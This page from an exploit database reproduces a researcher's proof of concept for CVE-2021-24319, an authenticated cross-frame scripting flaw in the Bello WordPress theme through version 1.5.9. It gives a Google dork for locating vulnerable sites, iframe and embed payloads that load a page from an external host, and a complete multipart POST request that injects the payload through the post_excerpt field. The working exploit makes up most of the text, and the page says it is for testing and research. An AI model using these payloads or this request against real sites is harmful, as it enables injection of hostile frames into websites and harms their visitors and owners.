Advertisement






Bello WordPress Theme < = 1.5.9 - Authenticated XFS

CVE Category Price Severity
CVE-2021-24319 CWE-1021 $500 High
Author Risk Exploitation Type Date
Unknown High Authenticated 2021-05-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050094

Below is a copy:

Bello WordPress Theme <= 1.5.9 - Authenticated XFS
/*!
- # VULNERABILITY: Bello WordPress Theme <= 1.5.9 - Authenticated XFS
- # GOOGLE DORK: inurl:/wp-content/themes/bello/
- # DATE: 2021-03-21
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoldThemes [ https://bold-themes.com ]
- # SOFTWARE VERSION: <= 1.5.9
- # SOFTWARE LINK: https://themeforest.net/item/bello-directory-listing-wordpress-theme/21815903
- # CVSS: AV:N/AC:L/PR:L/UI:R/S:C
- # CWE: CWE-1021
- # CVE: CVE-2021-24319
*/



### -- [ Info: ]

[i] An Authenticated XFS vulnerability was discovered in the Bello theme through v1.5.9 for WordPress.

[i] Vulnerable parameter(s): &post_excerpt.

[i] Plugin(s) affected: Bello by BoldThemes [ https://bold-themes.com ].



### -- [ Impact: ]

[~] Malicious iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html>

[$] <!--><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>



### -- [ PoC | Authenticated XFS | My Listings: ]

[!] POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1
Host: bello.bold-themes.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402
Content-Length: 13779
Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
Cookie: [user cookies]

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="action"

ajax_submit
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_form_config"

5d63602a0e2f80c83196bc5ea6405fca
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_title"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_content"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_excerpt"

</textarea><!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>
<iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="nonce_listing_cf"

e1c3b088fu
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_wp_http_referer"

/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-location_position"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-region"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_from"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_to"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_free"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-faq"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package"

bello-default-package
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

49
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_submit"

1
-----------------------------16118302073611242382926219402--



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum